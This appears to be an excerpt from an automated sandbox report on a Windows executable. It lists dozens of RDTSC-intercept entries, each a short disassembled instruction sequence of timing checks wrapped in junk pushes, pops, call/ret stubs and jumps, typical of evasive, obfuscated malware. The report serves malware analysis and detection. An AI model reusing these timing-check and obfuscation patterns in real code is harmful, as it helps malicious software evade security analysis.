Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412E54 second address: 1412E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14120AB second address: 14120B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1418ED7 second address: 1418EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1418F88 second address: 1418F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419E40 second address: 1419E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419E44 second address: 1419E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9844BC1D64h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141AF51 second address: 141AF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141BEB1 second address: 141BEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141BEB6 second address: 141BF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F98450EE8C8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D29DBh] 0x0000002f call 00007F98450EE8D8h 0x00000034 mov dword ptr [ebp+122D1842h], edx 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d pushad 0x0000003e jmp 00007F98450EE8D7h 0x00000043 mov edx, dword ptr [ebp+122D2C91h] 0x00000049 popad 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+1245E949h], ebx 0x00000052 push eax 0x00000053 pushad 0x00000054 jc 00007F98450EE8CCh 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141CE2D second address: 141CE33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141CE33 second address: 141CE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141CE3A second address: 141CEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9844BC1D58h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F9844BC1D58h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 jc 00007F9844BC1D5Ch 0x00000046 or ebx, dword ptr [ebp+122D2C8Dh] 0x0000004c push 00000000h 0x0000004e jmp 00007F9844BC1D5Eh 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jp 00007F9844BC1D56h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DDCE second address: 141DDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141618D second address: 1416191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419FC6 second address: 1419FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1419FCB second address: 141A03B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F9844BC1D56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9844BC1D61h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F9844BC1D58h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov bh, cl 0x00000031 push dword ptr fs:[00000000h] 0x00000038 movzx ebx, cx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 and bl, FFFFFFFEh 0x00000045 mov eax, dword ptr [ebp+122D0A51h] 0x0000004b clc 0x0000004c push FFFFFFFFh 0x0000004e mov dword ptr [ebp+122D2239h], edi 0x00000054 nop 0x00000055 push ecx 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B1E3 second address: 141B1EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B1EA second address: 141B1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007F9844BC1D6Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141C045 second address: 141C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141B1FC second address: 141B200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141C04A second address: 141C07C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F98450EE8D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141C07C second address: 141C10A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov bl, D7h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bx, di 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F9844BC1D58h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+1244DFE0h], esi 0x0000003b mov eax, dword ptr [ebp+122D12B5h] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007F9844BC1D58h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000019h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b push FFFFFFFFh 0x0000005d jnc 00007F9844BC1D61h 0x00000063 nop 0x00000064 jnp 00007F9844BC1D60h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141D04F second address: 141D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98450EE8CAh 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F98450EE8CCh 0x00000011 nop 0x00000012 mov di, 8858h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d je 00007F98450EE8C9h 0x00000023 mov di, cx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d xor ebx, 77B53347h 0x00000033 jg 00007F98450EE8C9h 0x00000039 mov eax, dword ptr [ebp+122D00F9h] 0x0000003f movzx edi, si 0x00000042 push FFFFFFFFh 0x00000044 mov edi, 6128A2D8h 0x00000049 jne 00007F98450EE8C7h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 jmp 00007F98450EE8CEh 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141C10A second address: 141C10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141C10E second address: 141C112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1420EB3 second address: 1420EC5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F9844BC1D5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1422FFB second address: 1423008 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1423008 second address: 142300E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142300E second address: 1423042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F98450EE8D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F98450EE8D4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142514E second address: 1425152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1425152 second address: 1425158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1425158 second address: 142515E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142515E second address: 142518D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jne 00007F98450EE8C6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F98450EE8C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142518D second address: 14251FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F9844BC1D58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx edi, si 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F9844BC1D58h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 push 00000000h 0x00000047 pushad 0x00000048 xor si, 6E66h 0x0000004d mov eax, dword ptr [ebp+1244DBD7h] 0x00000053 popad 0x00000054 xchg eax, esi 0x00000055 jl 00007F9844BC1D60h 0x0000005b pushad 0x0000005c push edi 0x0000005d pop edi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DEE1 second address: 141DF94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c je 00007F98450EE8CCh 0x00000012 sub dword ptr [ebp+122D1D09h], edx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F98450EE8C8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 call 00007F98450EE8D7h 0x00000045 jmp 00007F98450EE8D5h 0x0000004a pop ebx 0x0000004b mov eax, dword ptr [ebp+122D01DDh] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007F98450EE8C8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000015h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b mov dword ptr [ebp+122DB647h], edi 0x00000071 push FFFFFFFFh 0x00000073 and bx, 689Dh 0x00000078 or bl, 00000012h 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141DF94 second address: 141DF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9844BC1D56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141EFF3 second address: 141F004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 js 00007F98450EE8D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14231DC second address: 14231E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14231E2 second address: 1423205 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F98450EE8D6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1423205 second address: 1423209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1423209 second address: 1423213 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142545A second address: 142547A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jg 00007F9844BC1D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142547A second address: 142547E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142E310 second address: 142E361 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9844BC1D6Fh 0x00000008 jno 00007F9844BC1D5Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9844BC1D5Bh 0x00000017 push esi 0x00000018 jmp 00007F9844BC1D63h 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142E361 second address: 142E366 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142E366 second address: 142E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142DA8E second address: 142DACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F98450EE8CEh 0x0000000b pushad 0x0000000c je 00007F98450EE8E3h 0x00000012 jmp 00007F98450EE8D0h 0x00000017 jmp 00007F98450EE8CDh 0x0000001c jng 00007F98450EE8CCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142DACD second address: 142DAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9844BC1D5Ch 0x0000000a jo 00007F9844BC1D56h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142DD6F second address: 142DD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 142DD73 second address: 142DD94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F9844BC1D64h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14334C1 second address: 14334C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14334C7 second address: 14334CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14379F1 second address: 14379F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14379F7 second address: 1437A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9844BC1D66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437A17 second address: 1437A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437A2D second address: 1437A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437E76 second address: 1437E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437E7B second address: 1437E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F9844BC1D56h 0x00000009 ja 00007F9844BC1D56h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F9844BC1D5Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1437E9C second address: 1437EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143C27F second address: 143C285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144160A second address: 144160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144160F second address: 144161D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9844BC1D58h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141436D second address: 1414371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414371 second address: 1414375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414375 second address: 141437B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141437B second address: 14143B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9844BC1D64h 0x00000008 jmp 00007F9844BC1D5Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9844BC1D5Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414496 second address: 14144BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F98450EE8CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14144BD second address: 14144C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14144C1 second address: 14144C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14144C7 second address: 1414524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e jmp 00007F9844BC1D5Ch 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jmp 00007F9844BC1D62h 0x0000001d pop eax 0x0000001e movzx edx, cx 0x00000021 push B0963E1Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9844BC1D64h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14145B0 second address: 14145C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14145C0 second address: 14145E1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9844BC1D5Ch 0x00000008 jbe 00007F9844BC1D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9844BC1D5Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14145E1 second address: 14145E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14145E5 second address: 14145EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414832 second address: 1414837 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414837 second address: 14148A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F9844BC1D58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ecx, dword ptr [ebp+1244DFE0h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F9844BC1D58h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007F9844BC1D65h 0x0000004a movsx edx, ax 0x0000004d popad 0x0000004e nop 0x0000004f jbe 00007F9844BC1D5Eh 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14148A7 second address: 14148B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F98450EE8C6h 0x0000000f rdtsc
